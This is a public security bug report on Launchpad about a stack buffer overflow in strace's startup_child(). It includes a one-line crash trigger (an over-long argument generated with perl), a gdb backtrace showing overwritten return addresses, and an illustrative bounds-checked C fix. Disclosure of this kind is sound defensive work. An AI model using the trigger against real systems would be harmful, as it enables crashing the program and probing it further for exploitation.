*** This bug is a security vulnerability ***
Public security bug reported:
Tested version: strace-4.9 (from strace sourceforge), strace-4.8 (apt-get install strace)
Environment: Ubuntu 14.04.1 LTS x86_64
Details:
Stack buffer overflow in startup_child() in strace.c.
The input length check can be bypassed using a long string that does not contain a '/'
character.
So the strcpy() call in the PATH concatenation code starts to overwrite
stack data.
-------------- TEST PAYLOAD
abc@ubuntu:~$ ./strace `perl -e 'print "a"x5042'`
Segmentation fault
-------------- Backtrace with debugging symbol
(gdb) r `perl -e 'print "a"x5042'`
Starting program: /home/abc/strace-4.9/strace `perl -e 'print "a"x5042'`
Program received signal SIGSEGV, Segmentation fault.
__GI_getenv (name=0x7fe3b8107b5b "NGUAGE", name@entry=0x7fe3b8107b59
"LANGUAGE") at getenv.c:85
85 getenv.c: No such file or directory.
(gdb) bt
#0 __GI_getenv (name=0x7fe3b8107b5b "NGUAGE", name@entry=0x7fe3b8107b59
"LANGUAGE") at getenv.c:85
#1 0x00007fe3b7fbc681 in guess_category_value (categoryname=0x7fe3b80f16b3
<_nl_category_names+51> "LC_MESSAGES", category=5)
at dcigettext.c:1372
#2 __dcigettext (domainname=0x7fe3b8107a99 <_libc_intl_domainname> "libc",
msgid1=0x7fe3b81081ac "File name too long",
msgid2=msgid2@entry=0x0, plural=plural@entry=0, n=n@entry=0,
category=category@entry=5) at dcigettext.c:573
#3 0x00007fe3b7fbb5df in __GI___dcgettext (domainname=<optimized out>,
msgid=<optimized out>, category=category@entry=5)
at dcgettext.c:52
#4 0x00007fe3b801398e in __GI___strerror_r (errnum=errnum@entry=36,
buf=buf@entry=0x0, buflen=buflen@entry=0) at _strerror.c:71
#5 0x00007fe3b80138cf in strerror (errnum=errnum@entry=36) at strerror.c:32
#6 0x000000000041230f in verror_msg (err_no=36, fmt=fmt@entry=0x4273da "Can't
stat '%s'", p=p@entry=0x7fff6b28dbf8) at strace.c:277
#7 0x000000000041315a in perror_msg_and_die (fmt=fmt@entry=0x4273da "Can't
stat '%s'") at strace.c:323
#8 0x000000000041371e in startup_child (argv=0x7fff6b28f160) at strace.c:1220
#9 0x6161616161616161 in ?? ()
#10 0x6161616161616161 in ?? ()
#11 0x6161616161616161 in ?? ()
#12 0x6161616161616161 in ?? ()
#13 0x6161616161616161 in ?? ()
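The report above describes a PATH search that bounds-checks the argument only when it contains a '/', then strcpy()s an unchecked candidate into a fixed stack buffer on the other branch. The following is an added illustration, not strace's own code or its fix: a simplified PATH lookup in which the length check covers directory, separator and filename together on every candidate, so an over-long name is skipped (ENAMETOOLONG) instead of overflowing. The 4096-byte buffer size, the "." stand-in for an empty PATH entry and the sample_exists() predicate replacing stat() are assumptions for the example.

```c
#include <errno.h>
#include <string.h>

typedef int (*exists_fn)(const char *candidate);

/* Write "<dir>/<filename>" into out (capacity outsz). Returns the length, or -1
 * with errno = ENAMETOOLONG when dir + separator + filename would not fit. */
static int join_path(char *out, size_t outsz, const char *dir, size_t dirlen,
                     const char *filename)
{
    size_t flen = strlen(filename);
    size_t sep = (dirlen > 0 && dir[dirlen - 1] != '/') ? 1 : 0;
    size_t total = dirlen + sep + flen;
    if (total >= outsz) {               /* keep room for the terminating NUL */
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(out, dir, dirlen);
    if (sep)
        out[dirlen] = '/';
    memcpy(out + dirlen + sep, filename, flen + 1);
    return (int)total;
}

/* PATH-style lookup: a name containing '/' is used as given; otherwise each
 * colon-separated entry is tried (an empty entry meaning the current directory,
 * simplified here to "."). The length check runs on both branches, so an
 * over-long candidate is skipped instead of copied. Returns 0 or -1. */
int path_search(const char *path, const char *filename, exists_fn exists,
                char *out, size_t outsz)
{
    if (strchr(filename, '/'))
        return (join_path(out, outsz, "", 0, filename) >= 0 && exists(out)) ? 0 : -1;
    for (const char *p = path; p && *p; ) {
        const char *colon = strchr(p, ':');
        size_t n = colon ? (size_t)(colon - p) : strlen(p);
        int r = (n == 0) ? join_path(out, outsz, ".", 1, filename)
                         : join_path(out, outsz, p, n, filename);
        if (r >= 0 && exists(out))
            return 0;
        p += colon ? n + 1 : n;
    }
    return -1;
}

/* Constructed stand-in for stat(): the only "executables" that exist here. */
int sample_exists(const char *candidate)
{
    return strcmp(candidate, "/usr/bin/ls") == 0 || strcmp(candidate, "./tool") == 0;
}
```

With a 5042-byte name such as the one in the test payload, every candidate fails the check and the function returns -1 without touching the buffer.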
** Affects: strace (Ubuntu)
Importance: Undecided
Status: New
** Information type changed from Private Security to Public Security
https://bugs.launchpad.net/bugs/1426635
Title:
strace stack buffer overflow